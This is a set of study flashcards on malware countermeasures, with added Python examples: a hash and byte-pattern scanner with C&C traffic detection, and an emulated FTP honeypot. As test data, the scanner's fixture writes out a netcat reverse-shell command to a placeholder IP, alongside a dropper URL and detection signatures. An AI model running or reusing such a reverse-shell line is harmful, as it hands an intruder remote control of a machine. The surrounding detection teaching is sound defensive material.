4. Malware Countermeasures Flashcards

1
Q

What are the malware countermeasures?

A

- Prevention
  - Raise awareness
  - Prevent vulnerabilities
  - Define policies
- Detection
  - Host-based
  - Network-based
  - Honeypots
- Mitigation
  - Threat mitigation
  - Teardown
- Malware analysis
  - Static analysis
  - Dynamic analysis

2
Q

What are the requirements for effective countermeasures?

A
  • General – able to handle a wide variety of attacks
  • Timely – responds quickly, to limit the number of infected programs/systems
  • Resilient – resistant to evasion techniques
  • Low denial-of-service cost – minimal reduction in capacity or service, minimal disruption of normal operation
  • Transparent – countermeasure software and devices should not require modification of existing legacy operating systems, application software or hardware
  • Global and local coverage – deals with attack sources outside as well as inside the enterprise network
3
Q

How do you detect infections with known malware?

A
  • Host-based
    • Scan files and memory for known malware signatures (exact file hashes, byte patterns)
  • Network-based
    • Scan traffic for known patterns or for connections to known command-and-control (C&C) servers
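Added example for this card (not code from the original deck): a host-based scanner that matches files against hash and byte-pattern signatures, and a network-based detector that matches proxy log lines against known C&C domains, a known check-in URI pattern, and fixed-interval beaconing. Every signature, file, hostname (`Trojan.Demo.*`, `panel.badguys.example`) and log line is constructed for the demonstration; a real deployment would load them from a signature or threat-intel feed.

```python
"""Known-malware detection: host-based signatures and network-based C&C matching."""
import hashlib
import re
from collections import defaultdict


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


# Host-based: a constructed "known sample" (PE-like header plus an embedded
# download URL) whose exact hash is pinned as a signature.
KNOWN_SAMPLE = b"MZ\x90\x00" + b"\x00" * 28 + b"http://update-cdn.example/drop.bin\x00"
HASH_SIGNATURES = {sha256(KNOWN_SAMPLE): "Trojan.Demo.Dropper"}

# Byte-pattern signatures (the idea behind YARA-style rules) keep matching
# when a trivially modified variant changes the file hash.
BYTE_SIGNATURES = {
    "Trojan.Demo.Dropper.gen": b"http://update-cdn.example/drop.bin",
    "Backdoor.Demo.Shell": b"cmd.exe /c nc -e",
}


def scan_file(data: bytes) -> list:
    """Return (signature name, match type) pairs for one file's contents."""
    hits = []
    name = HASH_SIGNATURES.get(sha256(data))
    if name:
        hits.append((name, "hash"))
    for sig_name, pattern in BYTE_SIGNATURES.items():
        if pattern in data:
            hits.append((sig_name, "pattern"))
    return hits


def scan_host(files: dict) -> dict:
    """Scan a path -> contents mapping; return only the files with detections."""
    detections = {}
    for path, data in files.items():
        hits = scan_file(data)
        if hits:
            detections[path] = hits
    return detections


# Constructed file system: the pinned sample, a padded variant (hash changed,
# pattern intact), a second family, and a clean file.
HOST_FILES = {
    "C:/Users/alice/AppData/Local/Temp/setup.exe": KNOWN_SAMPLE,
    "C:/Users/alice/AppData/Local/Temp/setup_v2.exe": KNOWN_SAMPLE + b"\x00" * 16,
    "C:/ProgramData/svc.bat": b"@echo off\r\ncmd.exe /c nc -e cmd.exe 203.0.113.7 4444\r\n",
    "C:/Windows/notepad.exe": b"MZ\x90\x00" + b"\x00" * 28 + b"This program cannot be run in DOS mode",
}

# Network-based: constructed indicators of known C&C infrastructure and traffic.
C2_DOMAINS = {"update-cdn.example", "panel.badguys.example"}
C2_URI_PATTERN = re.compile(r"^/gate\.php\?id=[0-9a-f]{8}$")   # bot check-in URI
LOG_LINE = re.compile(r"^(\d+) (\S+) (\S+) (\S+) (\d+)$")       # ts src host uri bytes


def detect_c2(log_lines: list) -> list:
    """Return unique (src, host, reason) alerts: known C&C domain, known
    check-in URI, or beaconing (>= 4 requests at a near-constant interval)."""
    alerts = []
    per_pair = defaultdict(list)
    for line in log_lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        ts, src, host, uri, _ = m.groups()
        alert = None
        if host in C2_DOMAINS:
            alert = (src, host, "known C&C domain")
        elif C2_URI_PATTERN.match(uri):
            alert = (src, host, "known C&C check-in URI")
        if alert and alert not in alerts:
            alerts.append(alert)
        per_pair[(src, host)].append(int(ts))
    for (src, host), times in per_pair.items():
        gaps = [b - a for a, b in zip(times, times[1:])]
        if len(gaps) >= 3 and max(gaps) - min(gaps) <= 2:
            alerts.append((src, host, f"beaconing every ~{gaps[0]}s"))
    return alerts


# Constructed proxy log: "timestamp src dst-host uri bytes".
PROXY_LOG = [
    "1000 10.0.0.5 www.example.com / 5120",
    "1002 10.0.0.8 panel.badguys.example /gate.php?id=deadbeef 312",
    "1060 10.0.0.5 www.example.com /news 8000",
    "1062 10.0.0.8 panel.badguys.example /gate.php?id=deadbeef 312",
    "1122 10.0.0.8 panel.badguys.example /gate.php?id=deadbeef 312",
    "1182 10.0.0.8 panel.badguys.example /gate.php?id=deadbeef 312",
    "1200 10.0.0.9 unknown-host.example /gate.php?id=0badc0de 300",
]

if __name__ == "__main__":
    for path, hits in scan_host(HOST_FILES).items():
        print(path, hits)
    for alert in detect_c2(PROXY_LOG):
        print(alert)
```

Two things the card's one-liners hide: the padded variant `setup_v2.exe` is missed by the hash signature and caught only by the byte pattern, which is why scanners carry both; and the host `10.0.0.9` talks to a domain that is not on any list but is still flagged because its check-in URI and timing match known C&C behaviour.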
4
Q

What types of honeypots exist?

A

Honeypots
- Server-side or client-side (a server honeypot waits to be attacked; a client honeypot, e.g. an instrumented browser in a VM, visits servers to get attacked)
- Low-interaction or high-interaction (an emulated service versus a real, instrumented system)
- Physical or virtual
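
Added example for this card (not code from the original deck): a minimal low-interaction, server-side honeypot. It emulates only the FTP login dialogue, enough to record the credentials and commands an attacker tries, and refuses every login; there is no real service behind the banner, which is what makes it low-interaction. The banner text, the hostname `ftp.corp.example` and the test session are constructed.

```python
"""Low-interaction server-side honeypot: an emulated FTP login prompt."""
import socketserver

# Constructed banner; it looks like a real service so scanners and
# brute-force tools engage with it, but nothing exists behind it.
BANNER = b"220 ftp.corp.example FTP server ready\r\n"


class FtpEmulator:
    """Emulates just the FTP login exchange and records what the peer tries.
    Kept free of sockets so the logic can be exercised without a network."""

    def __init__(self, peer: str):
        self.peer = peer
        self.user = None
        self.events = []   # what a real deployment would ship to a SIEM

    def banner(self) -> bytes:
        return BANNER

    def feed(self, raw: bytes) -> tuple:
        """Consume one client line; return (reply bytes, session finished)."""
        line = raw.rstrip(b"\r\n")
        cmd, _, arg = line.partition(b" ")
        cmd = cmd.upper()
        if cmd == b"USER":
            self.user = arg.decode("utf-8", errors="replace")
            return b"331 Password required\r\n", False
        if cmd == b"PASS":
            self.events.append({"peer": self.peer, "event": "login", "user": self.user,
                                "password": arg.decode("utf-8", errors="replace")})
            return b"530 Login incorrect\r\n", False   # every login fails
        if cmd == b"QUIT":
            return b"221 Goodbye\r\n", True
        # Anything else is worth recording: it shows what the attacker
        # expected the service to support.
        self.events.append({"peer": self.peer, "event": "command",
                            "command": line.decode("utf-8", errors="replace")})
        return b"530 Please login with USER and PASS\r\n", False


class FtpHoneypotHandler(socketserver.StreamRequestHandler):
    """Socket glue: one FtpEmulator per connection, one line per round trip."""

    def handle(self):
        emu = FtpEmulator("%s:%d" % self.client_address)
        self.wfile.write(emu.banner())
        while True:
            raw = self.rfile.readline()
            if not raw:
                break
            reply, done = emu.feed(raw)
            self.wfile.write(reply)
            if done:
                break
        for event in emu.events:
            print("honeypot", event)


def serve(host: str = "127.0.0.1", port: int = 2121) -> None:
    """Run the honeypot. Bind a public address and port 21 only on an
    isolated host: the point is to be probed, not to be a pivot."""
    socketserver.ThreadingTCPServer.allow_reuse_address = True
    with socketserver.ThreadingTCPServer((host, port), FtpHoneypotHandler) as srv:
        srv.serve_forever()


if __name__ == "__main__":
    serve()
```

Run it and `nc 127.0.0.1 2121`, then type `USER root` and `PASS toor`: the tried credential pair is logged and the login is refused. A high-interaction honeypot would instead expose a real (instrumented, isolated) FTP server and let the attacker in, trading containment risk for richer observation.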
